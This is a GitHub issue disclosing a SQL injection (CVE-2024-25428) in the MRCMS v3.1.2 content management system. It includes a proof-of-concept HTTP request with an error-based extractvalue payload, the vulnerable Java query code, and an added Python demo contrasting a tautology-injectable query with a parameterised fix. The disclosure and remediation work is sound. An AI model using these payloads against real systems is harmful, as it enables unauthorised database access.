wuweiit / mushroom

MRCMS is a Java-based dynamic content management system
http://cms.yl-blog.com
MIT License

MRCMS 3.1.2 has a SQL injection vulnerability #19

Open xia0chensec opened 8 months ago

xia0chensec commented 8 months ago

[The name of an affected Product]

MRCMS

[The affected or fixed version]

v3.1.2

[CVE ID]

CVE-2024-25428

[Vulnerability Type]

SQL Injection

[Vulnerability Description]

MRCMS v3.1.2 is vulnerable to SQL Injection via the status parameter

[Vulnerability details]

The vulnerability exists at: http://localhost:8080/admin/article.do?cid=1&did=0&status=1&keyword=1&currentPageNo=1&pageSize=20

1. Select Content -> File management

2. Click the search button

SQL injection exists in the status parameter.

POC

GET /admin/article.do?cid=1&did=0&status=1+and+extractvalue(1,concat(0x7e,(select+user()),0x7e))&keyword=1123&currentPageNo=1&pageSize=20 HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost:8080/admin/index.do
Cookie: JSESSIONID=AD318CA555923823E93DC03659C2B5C0
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin


Code discovery

Code path: MRCMS\src\main\java\org\marker\mushroom\service\impl\ArticleService.java

public Page find(int currentPageNo, int pageSize, Map<String,Object> condition) {
    // Request parameters arrive in the condition map without validation.
    String keyword = (String) condition.get("keyword");
    String status = (String) condition.get("status");   // attacker-controlled string
    int cid = (Integer) condition.get("cid");
    int did = (Integer) condition.get("did");
    int userGroupId = (Integer) condition.get("userGroupId");
//  try {
//      keyword = new String(keyword.getBytes("ISO-8859-1"),"utf-8");
//  } catch (UnsupportedEncodingException e) {
//      e.printStackTrace();
//  }
    String prefix = config.getPrefix();

    String sql = "select a.id,a.title, a.author,a.views,a.status, a.time, concat('/cms?type=article','&id=',CAST(a.id as char),'&time=',DATE_FORMAT(a.time,'%Y%m%d'))  url, c.name as cname ,'article' model, a.stick from "+config.getPrefix()+"article as a "
            + "left join "+prefix+"channel c on c.id = a.cid ";

    // Injection point: the raw 'status' string is spliced into the IN (...) list.
    sql +=  "where a.status in ("+status+") ";
    if(userGroupId != 1){
        // userGroupId is an int, so this concatenation cannot carry SQL syntax.
        sql += " and a.cid in (select cid from "+prefix+"user_group_channel where gid = "+userGroupId+") ";
    }

In this code, the SQL query string is built through string concatenation, and there is a potential SQL injection risk at the status parameter.
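To make the flaw and its fix concrete, the following is an added example (not code from the MRCMS project or from the issue author). It models the `where a.status in (...)` concatenation from ArticleService.find in Python with sqlite3 so it runs offline; the table prefix `mr_`, the schema and the rows are constructed for the example, and an engine-neutral tautology payload stands in for the MySQL-specific extractvalue() payload used in the PoC. The hardened variant shows the IN-list case that trips people up with prepared statements: parse the parameter into integers first, then bind one placeholder per value.

```python
"""Vulnerable vs. hardened version of the status IN (...) query pattern.

Added example, not MRCMS code. Table prefix, schema and rows are constructed
so the example runs offline against sqlite3; the real query targets MySQL.
"""
import re
import sqlite3

PREFIX = "mr_"  # assumed stand-in for config.getPrefix()

SELECT_ARTICLES = (
    f"select a.id, a.title, a.status, c.name as cname "
    f"from {PREFIX}article as a "
    f"left join {PREFIX}channel c on c.id = a.cid "
)


def setup_db():
    """Constructed sample data: one published, one draft, one deleted article."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(f"""
        create table {PREFIX}channel (id integer primary key, name text);
        create table {PREFIX}article (
            id integer primary key, title text, cid integer, status integer);
        insert into {PREFIX}channel values (1, 'news');
        insert into {PREFIX}article values
            (1, 'published post', 1, 1),
            (2, 'unpublished draft', 1, 0),
            (3, 'deleted article', 1, -1);
    """)
    return conn


def find_vulnerable(conn, status):
    """Mirrors ArticleService.find(): 'status' is spliced into the SQL text."""
    sql = SELECT_ARTICLES + f"where a.status in ({status}) "
    return sorted(row[0] for row in conn.execute(sql))


def parse_status_list(status):
    """Allow only a comma-separated list of integers, e.g. "1" or "1,0"."""
    values = []
    for part in status.split(","):
        part = part.strip()
        if not re.fullmatch(r"-?\d+", part):
            raise ValueError(f"invalid status value: {part!r}")
        values.append(int(part))
    return values


def find_hardened(conn, status):
    """Validate first, then bind one placeholder per value (works for IN lists)."""
    values = parse_status_list(status)
    placeholders = ",".join("?" * len(values))
    sql = SELECT_ARTICLES + f"where a.status in ({placeholders}) "
    return sorted(row[0] for row in conn.execute(sql, values))


def demo():
    conn = setup_db()
    honest = find_vulnerable(conn, "1")          # only the published article
    # Tautology payload that closes the IN list and comments out the rest of
    # the statement; the issue's PoC instead uses MySQL-only extractvalue()
    # to surface data through an error message.
    payload = "1) or 1=1 -- "
    leaked = find_vulnerable(conn, payload)      # drafts and deleted rows too
    safe = find_hardened(conn, "1,0")            # legitimate multi-value list
    try:
        find_hardened(conn, payload)
        rejected = False
    except ValueError:
        rejected = True
    return honest, leaked, safe, rejected


if __name__ == "__main__":
    print(demo())
```

In the project's Java the same shape applies: parse `status` into a list of integers, emit one `?` per value in the IN list and bind each with `setInt` on a PreparedStatement, or better, map the parameter onto the fixed set of status codes the application actually uses and reject anything else.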